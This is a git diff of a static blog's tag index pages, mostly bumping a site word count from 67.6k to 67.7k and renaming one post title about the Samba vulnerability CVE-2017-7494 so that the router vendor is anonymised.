@@ -473,7 +473,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">67.6k</span>
+    <span title="Site words total count">67.7k</span>
   
 </div>
 
diff --git a/tags/wifi/index.html b/tags/wifi/index.html
index c39d3026..3cd3508f 100644
--- a/tags/wifi/index.html
+++ b/tags/wifi/index.html
@@ -473,7 +473,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">67.6k</span>
+    <span title="Site words total count">67.7k</span>
   
 </div>
 
diff --git a/tags/中间人/index.html b/tags/中间人/index.html
index 6e23b6be..9d3d9f42 100644
--- a/tags/中间人/index.html
+++ b/tags/中间人/index.html
@@ -473,7 +473,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">67.6k</span>
+    <span title="Site words total count">67.7k</span>
   
 </div>
 
diff --git a/tags/二进制/index.html b/tags/二进制/index.html
index 576dc91f..8892511a 100644
--- a/tags/二进制/index.html
+++ b/tags/二进制/index.html
@@ -473,7 +473,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">67.6k</span>
+    <span title="Site words total count">67.7k</span>
   
 </div>
 
diff --git a/tags/侧信道攻击/index.html b/tags/侧信道攻击/index.html
index bca3cefe..a710886f 100644
--- a/tags/侧信道攻击/index.html
+++ b/tags/侧信道攻击/index.html
@@ -473,7 +473,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">67.6k</span>
+    <span title="Site words total count">67.7k</span>
   
 </div>
 
diff --git a/tags/取证/index.html b/tags/取证/index.html
index 9884fb97..d84d0299 100644
--- a/tags/取证/index.html
+++ b/tags/取证/index.html
@@ -473,7 +473,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">67.6k</span>
+    <span title="Site words total count">67.7k</span>
   
 </div>
 
diff --git a/tags/复原文件/index.html b/tags/复原文件/index.html
index 19c1b74c..e43af865 100644
--- a/tags/复原文件/index.html
+++ b/tags/复原文件/index.html
@@ -473,7 +473,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">67.6k</span>
+    <span title="Site words total count">67.7k</span>
   
 </div>
 
diff --git a/tags/密码/index.html b/tags/密码/index.html
index 7047b946..a4f50ce8 100644
--- a/tags/密码/index.html
+++ b/tags/密码/index.html
@@ -473,7 +473,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">67.6k</span>
+    <span title="Site words total count">67.7k</span>
   
 </div>
 
diff --git a/tags/小米/index.html b/tags/小米/index.html
index 0087f9f8..d5a7ae96 100644
--- a/tags/小米/index.html
+++ b/tags/小米/index.html
@@ -551,7 +551,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">67.6k</span>
+    <span title="Site words total count">67.7k</span>
   
 </div>
 
diff --git a/tags/微信/index.html b/tags/微信/index.html
index d59d1818..c4e54962 100644
--- a/tags/微信/index.html
+++ b/tags/微信/index.html
@@ -473,7 +473,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">67.6k</span>
+    <span title="Site words total count">67.7k</span>
   
 </div>
 
diff --git a/tags/拒绝服务攻击/index.html b/tags/拒绝服务攻击/index.html
index 28d18bd6..ce2ff7b7 100644
--- a/tags/拒绝服务攻击/index.html
+++ b/tags/拒绝服务攻击/index.html
@@ -473,7 +473,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">67.6k</span>
+    <span title="Site words total count">67.7k</span>
   
 </div>
 
diff --git a/tags/数据库/index.html b/tags/数据库/index.html
index e258e7c8..e0bba566 100644
--- a/tags/数据库/index.html
+++ b/tags/数据库/index.html
@@ -499,7 +499,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">67.6k</span>
+    <span title="Site words total count">67.7k</span>
   
 </div>
 
diff --git a/tags/数据挖掘/index.html b/tags/数据挖掘/index.html
index b1fc6143..5221962b 100644
--- a/tags/数据挖掘/index.html
+++ b/tags/数据挖掘/index.html
@@ -473,7 +473,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">67.6k</span>
+    <span title="Site words total count">67.7k</span>
   
 </div>
 
diff --git a/tags/文件格式/index.html b/tags/文件格式/index.html
index b3d76b0c..22dd3d4b 100644
--- a/tags/文件格式/index.html
+++ b/tags/文件格式/index.html
@@ -499,7 +499,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">67.6k</span>
+    <span title="Site words total count">67.7k</span>
   
 </div>
 
diff --git a/tags/栈溢出/index.html b/tags/栈溢出/index.html
index b16babe2..7ab8e483 100644
--- a/tags/栈溢出/index.html
+++ b/tags/栈溢出/index.html
@@ -473,7 +473,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">67.6k</span>
+    <span title="Site words total count">67.7k</span>
   
 </div>
 
diff --git a/tags/模型实现/index.html b/tags/模型实现/index.html
index 5d94740f..d16a474c 100644
--- a/tags/模型实现/index.html
+++ b/tags/模型实现/index.html
@@ -473,7 +473,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">67.6k</span>
+    <span title="Site words total count">67.7k</span>
   
 </div>
 
diff --git a/tags/模糊测试/index.html b/tags/模糊测试/index.html
index 90bfb227..a4c3f152 100644
--- a/tags/模糊测试/index.html
+++ b/tags/模糊测试/index.html
@@ -499,7 +499,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">67.6k</span>
+    <span title="Site words total count">67.7k</span>
   
 </div>
 
diff --git a/tags/漏洞/index.html b/tags/漏洞/index.html
index be50b1b9..7b3cd424 100644
--- a/tags/漏洞/index.html
+++ b/tags/漏洞/index.html
@@ -473,7 +473,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">67.6k</span>
+    <span title="Site words total count">67.7k</span>
   
 </div>
 
diff --git a/tags/破解/index.html b/tags/破解/index.html
index 33e77e60..19960f00 100644
--- a/tags/破解/index.html
+++ b/tags/破解/index.html
@@ -473,7 +473,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">67.6k</span>
+    <span title="Site words total count">67.7k</span>
   
 </div>
 
diff --git a/tags/硬件层/index.html b/tags/硬件层/index.html
index c84871ea..60587f23 100644
--- a/tags/硬件层/index.html
+++ b/tags/硬件层/index.html
@@ -473,7 +473,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">67.6k</span>
+    <span title="Site words total count">67.7k</span>
   
 </div>
 
diff --git a/tags/自然语言处理/index.html b/tags/自然语言处理/index.html
index df2d1c45..41110061 100644
--- a/tags/自然语言处理/index.html
+++ b/tags/自然语言处理/index.html
@@ -473,7 +473,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">67.6k</span>
+    <span title="Site words total count">67.7k</span>
   
 </div>
 
diff --git a/tags/访问控制/index.html b/tags/访问控制/index.html
index e0d5710f..a53dea5a 100644
--- a/tags/访问控制/index.html
+++ b/tags/访问控制/index.html
@@ -473,7 +473,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">67.6k</span>
+    <span title="Site words total count">67.7k</span>
   
 </div>
 
diff --git a/tags/调试/index.html b/tags/调试/index.html
index fe8bd9c9..4b12fbdf 100644
--- a/tags/调试/index.html
+++ b/tags/调试/index.html
@@ -473,7 +473,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">67.6k</span>
+    <span title="Site words total count">67.7k</span>
   
 </div>
 
diff --git a/tags/路由器/index.html b/tags/路由器/index.html
index 46cf0c7c..c080389b 100644
--- a/tags/路由器/index.html
+++ b/tags/路由器/index.html
@@ -499,7 +499,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">67.6k</span>
+    <span title="Site words total count">67.7k</span>
   
 </div>
 
diff --git a/tags/远程执行/index.html b/tags/远程执行/index.html
index f96dc533..66cf67f6 100644
--- a/tags/远程执行/index.html
+++ b/tags/远程执行/index.html
@@ -310,7 +310,7 @@
         
             <a class="post-title-link" href="/2019/03/25/Samba-CVE/" itemprop="url">
               
-                <span itemprop="name">小米路由器与Samba漏洞CVE-2017-7494</span>
+                <span itemprop="name">某厂商路由器与Samba漏洞CVE-2017-7494</span>
               
             </a>
         
@@ -473,7 +473,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">67.6k</span>
+    <span title="Site words total count">67.7k</span>
   
 </div>
 
diff --git a/tags/逆向/index.html b/tags/逆向/index.html
index b95eeb2c..2aab861f 100644
--- a/tags/逆向/index.html
+++ b/tags/逆向/index.html
@@ -473,7 +473,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">67.6k</span>
+    <span title="Site words total count">67.7k</span>
   
 </div>
 
diff --git a/tags/重放攻击/index.html b/tags/重放攻击/index.html
index 8c8897c4..37bcc84d 100644
--- a/tags/重放攻击/index.html
+++ b/tags/重放攻击/index.html
@@ -473,7 +473,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">67.6k</span>
+    <span title="Site words total count">67.7k</span>
   
 </div>